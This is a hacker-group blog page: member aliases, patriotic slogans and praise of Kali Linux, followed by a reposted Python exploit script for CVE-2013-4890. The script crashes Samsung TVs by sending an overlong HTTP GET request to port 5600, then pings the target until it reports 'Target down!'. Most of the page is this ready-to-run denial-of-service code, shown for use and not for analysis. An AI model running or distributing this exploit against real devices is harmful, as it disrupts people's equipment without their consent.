We are :- DeadManINDIA,Null_Port_Govind,Haxor Rahul,EagleShadow,Karate-Katrina,Spy-Hunter,Grey-Noob,Mr.R@66!T.

A big Slute to Our Indian Armies

Freedom is not free Our Soldiers Donates theirs lifes for us

We are Indians and We are Proud to be Indians

India is great.Because their is one place in the world where Peoples Recpect all Religious.

Kali is good OS for Hacking

Peoples Says this OS is best This OS is best but no one OS like Kali Linux .


I can't saw God but When i see my MOM and DAD then i think God in there they are My Gods Love You MOM DAD.

Tuesday 30 July 2013

Exploit Title: Samsung TV Denial of Service (DoS) Attack


# Exploit Title: Samsung TV Denial of Service (DoS) Attack
# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
# Date: 07/21/2013
# CVE Number: CVE-2013-4890
# Vendor Homepage: http://www.samsung.com
# Description:
#   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#   As a results, the TV reboots...
#   Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :)
import httplib
import sys
import os

print "  ***************************************************************************************"
print "   Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description:\n"
print "     The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "     Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

# Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)

# Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"